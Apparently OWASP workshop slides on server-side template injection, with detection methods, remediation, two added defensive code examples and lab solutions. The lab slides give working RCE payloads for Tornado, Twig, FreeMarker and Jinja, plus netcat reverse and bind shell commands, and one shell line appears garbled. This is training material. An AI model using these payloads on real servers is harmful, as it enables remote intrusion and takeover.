Server Side Template Injection
Gérôme Dieu
OWASP Workshop, February 2017
2017-02-22 Gérôme Dieu - owasp 2017 Workshop 1

What is a template engine?
• Modern web applications support template engines
• They help developers separate program logic and presentation into two distinct parts
• They offer rich functionality in wikis, blogs, CMSs…
• Typical uses:
  • Display information about users, products, companies…
  • Display galleries of photos, videos…
  • Send bulk emails
https://en.wikipedia.org/wiki/Web_template_system

Example: Jinja/Flask

What is a template injection?
• Some applications embed unvalidated user input into the template engine
• The input is then injected into the template context itself, not only into the rendered output
• The symptom is often reported as an XSS finding while the underlying SSTI is missed
• Can lead to remote code execution (RCE)
• Root cause: developer error or intentional exposure of the template language to users

Common template engines
• PHP: Smarty, Twig
• Java: Velocity, FreeMarker
• Python: Jinja, Mako, Tornado
• JavaScript: Jade, Rage
• Ruby: Liquid

Methodology (based on James Kettle’s research)
http://blog.portswigger.net/2015/08/server-side-template-injection.html#Methodology

Detect
• Plaintext context: user input is rendered directly as HTML
  • Probe: Hello {2*2}
  • Expected result: Hello 4
• Code context: user input lands inside a template expression (e.g. as a variable name)
  • Probe: variable=username}} (breaks out of the template statement)
  • Expected result:
• Tips:
  • Try a basic XSS payload
  • Try a math expression: {{2*2}}
  • Classic syntaxes: {exp}, {{exp}}, ${exp}, <%exp%>…
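The same probe syntaxes are what a defender should be hunting for in access logs. The following is an added example (not part of the workshop slides) that runs the classic delimiters listed above, plus the "closing delimiter only" break-out probe, over a constructed access-log sample; the log lines, the probe-family names and the regexes are my own assumptions, written against the common log format.

```python
# Added example (not from the workshop): scanning web-server access logs for
# the SSTI probe syntaxes listed on the Detect slide. The log lines are
# constructed for this demonstration; the probe-family names are my own.
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Constructed sample: lines 1 and 5 are benign, lines 2-4 carry the classic
# probes, and line 6 is the "break out of the statement" probe (a dangling
# closing delimiter); its 500 status is the kind of side effect to look for.
SAMPLE_LOG = """\
10.0.0.5 - - [22/Feb/2017:10:00:01 +0000] "GET /?name=alice HTTP/1.1" 200 512
10.0.0.9 - - [22/Feb/2017:10:00:02 +0000] "GET /?name=%7B%7B2*2%7D%7D HTTP/1.1" 200 512
10.0.0.9 - - [22/Feb/2017:10:00:03 +0000] "GET /?name=%24%7B7*7%7D HTTP/1.1" 200 512
10.0.0.9 - - [22/Feb/2017:10:00:04 +0000] "GET /?name=%3C%25%3D3*3%25%3E HTTP/1.1" 200 512
10.0.0.7 - - [22/Feb/2017:10:00:05 +0000] "GET /?price=%7B10%7D HTTP/1.1" 200 512
10.0.0.9 - - [22/Feb/2017:10:00:06 +0000] "GET /?name=bob%7D%7D HTTP/1.1" 500 0
"""

# Request target ("GET /path?query HTTP/1.1") of a common-log-format line.
REQUEST_RE = re.compile(r'"(?:GET|POST|PUT|PATCH) (\S+) HTTP/')

# Ordered most specific first. Single braces are common in legitimate data,
# so they only count when they wrap an arithmetic test such as {2*2}.
PROBE_PATTERNS = [
    ("double-brace", re.compile(r"\{\{.*?\}\}")),   # {{2*2}}  Jinja, Twig, Tornado
    ("dollar-brace", re.compile(r"\$\{.*?\}")),     # ${2*2}   FreeMarker, Velocity
    ("erb-tag", re.compile(r"<%.*?%>")),            # <%2*2%>  ERB / JSP-style
    ("brace-math", re.compile(r"\{[^{}]*\d+\s*[*+/-]\s*\d+[^{}]*\}")),  # {2*2}
]


def classify_request(target: str) -> Optional[str]:
    """Return the probe family found in a percent-encoded request target,
    or None when nothing template-like is present."""
    decoded = unquote(target)
    for name, pattern in PROBE_PATTERNS:
        if pattern.search(decoded):
            return name
    # A closing delimiter with no opener is the break-out probe from the
    # slide (username}}): the attacker closes the current expression so the
    # rest of the input is parsed as template code.
    if ("}}" in decoded and "{{" not in decoded) or ("%>" in decoded and "<%" not in decoded):
        return "dangling-close"
    return None


def find_ssti_probes(log_text: str) -> List[Tuple[int, str, str]]:
    """Scan access-log text; return (line number, probe family, decoded target)."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        kind = classify_request(match.group(1))
        if kind:
            hits.append((lineno, kind, unquote(match.group(1))))
    return hits


if __name__ == "__main__":
    for lineno, kind, target in find_ssti_probes(SAMPLE_LOG):
        print(f"line {lineno}: {kind:14s} {target}")
```

This is a triage aid rather than a verdict: the dangling-close rule in particular will fire on JSON-like values, so pair the hits with the response status (a probe that turns a 200 into a 500, as on line 6) and with POST bodies, which this sample does not cover.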

Identify
http://blog.portswigger.net/2015/08/server-side-template-injection.html#Methodology

Exploit
• Read the documentation: a really important step
  • Security considerations, configuration, environment, extensions/plugins, built-in methods, filters…
• Explore: find out what we have access to within the template execution environment
  • Expose the self object, brute-force variable names
• Attack: try to exploit it
  • Some classes can be used to trigger object creation, read/write files, escalate privileges…

Remediation
• Use a trivial template engine such as Mustache or Python’s simple Template class
• Complementary approach: run the engine in a sandbox, within a safe environment (hardened and isolated OS)
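The two preceding points (what the injection is, and why a trivial engine limits the damage) can be shown side by side. The following is an added example, not code from the workshop: it uses Python’s standard-library string.Template, which I take to be the "simple Template" the slide refers to, and renders one untrusted value first as template source (the bug) and then as template data (the fix). The context dictionary and the secret value are constructed for the demonstration.

```python
# Added example (not from the workshop): the same untrusted value handled as
# template *source* versus as template *data*, using Python's stdlib
# string.Template as the trivial engine the remediation slide recommends.
# All names and values below are constructed for the demonstration.
from string import Template

# Constructed server-side context; db_password stands in for a value that
# must never be exposed through the rendered page.
CONTEXT = {"user": "alice", "db_password": "constructed-secret"}


def render_vulnerable(user_input: str) -> str:
    """Anti-pattern from the SSTI slide: untrusted input is concatenated into
    the template source, so the engine parses it as template syntax."""
    source = "Hello " + user_input + ", welcome back $user"
    return Template(source).safe_substitute(CONTEXT)


def render_hardened(user_input: str) -> str:
    """Fixed pattern: the template source is a constant and the untrusted
    input is supplied as a substitution value, which is never re-parsed."""
    source = "Hello $greeting, welcome back $user"
    return Template(source).safe_substitute(CONTEXT, greeting=user_input)


def compare(probe: str) -> dict:
    """Render one probe both ways, for a side-by-side view."""
    return {"vulnerable": render_vulnerable(probe), "hardened": render_hardened(probe)}


if __name__ == "__main__":
    # "{{2*2}}" is left untouched by both: string.Template evaluates no
    # expressions, so a trivial engine cannot be pushed to code execution.
    # "$db_password" still leaks the context in the vulnerable version:
    # concatenating input into the template is the bug whatever the engine.
    for probe in ("{{2*2}}", "$db_password"):
        print(probe, compare(probe))
```

The vulnerable function leaks the context variable because the engine parses the user-supplied "$db_password" as a placeholder; the hardened function returns it verbatim. With a richer engine (Jinja, Twig, FreeMarker) the same concatenation is what turns a variable leak into the RCE shown in the labs, while the trivial engine caps the impact at context disclosure, which is the point of the first remediation bullet.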

Demo

References
• James Kettle - PortSwigger
  • http://blog.portswigger.net/2015/08/server-side-template-injection.html
• Wikipedia
  • https://en.wikipedia.org/wiki/Template_engine
  • https://en.wikipedia.org/wiki/Comparison_of_web_template_engines

A reminder before starting
• Bind shell
  • Opens a listening port on the victim server
  • nc -l -p 4444 -e /bin/sh
• Reverse shell
  • Opens a connection back to the attacker machine
  • nc IP_attacker 4444 -e /bin/sh
• Reference
  • https://highon.coffee/blog/reverse-shell-cheat-sheet/#bash-reverse-shells

Labs
• Lab 1:
  • http://10.11.65.[198-199]:8000/?name=xxxxx
• Lab 2:
  • http://10.11.65.[198-199]:80/
• Lab 3:
  • http://10.11.65.[198-199]:8181/
• Lab 4:
  • http://10.11.65.[198-199]:5000/
• Lab 5:
  • http://10.11.65.200/admin (gdieu/password)

Lab 1: hints
• Syntax:
  • http://www.tornadoweb.org/en/stable/template.html?highlight=templating#syntax-reference

Lab 1: Tornado
• Detection: {{2*2}}
• Identification: take a look at the headers
• Exploitation:
  • {% import os %}{{ os.popen("cmd").read() }}
  • Reverse shell:
    • rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ip_addr port >/tmp/f
  • Bind shell:
    • mkfifo foo ; nc -lk port 0foo

Lab 2: hints
• Central object called the environment:
  • http://twig.sensiolabs.org/doc/2.x/api.html
  • https://github.com/twigphp/Twig/blob/e22fb8728b395b306a06785a3ae9b12f3fbc0294/lib/Twig/Environment.php
• call_user_func:
  • http://php.net/manual/en/function.call-user-func.php

Lab 2: Twig
• Detection: {{2*2}}
• Identification: take a look at the headers
• Exploitation:
  • {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cmd")}}

Lab 3: hints
• Built-in new:
  • http://freemarker.org/docs/ref_builtins_expert.html#ref_builtin_new
• assign:
  • http://freemarker.org/docs/ref_directive_assign.html
• Useful classes:
  • http://freemarker.org/docs/api/freemarker/template/utility/Execute.html

Lab 3: FreeMarker
• Detection: ${2*2}
• Identification: take a look at the headers
• Exploitation:
  • <#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("cmd") }

Lab 4: hints
• __mro__ and __subclasses__ attributes
• type object and class
• from_pyfile method of the Config class (flask/config.py)

Lab 4: Jinja/Flask
• Detection: ${2*2}
• Identification: take a look at the headers
• Exploitation:
  • 1 - ''.__class__.__mro__[2].__subclasses__()[40]("cmd").read()
  • 2 - {{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/payload.cfg', 'w').write('from subprocess import check_output\n\nCMD = check_output\n') }}
  • 3 - {{ config.from_pyfile('/tmp/payload.cfg') }}
  • 4 - {{ config['CMD']('cmd', shell=True) }}

Lab 5: bonus
• Solution:
  • Retrieve the DB password:
    • https://craftcms.com/docs/templating/craft.config
  • Scan all TCP ports:
    • SSH service on port 10022
  • Use the DB password to authenticate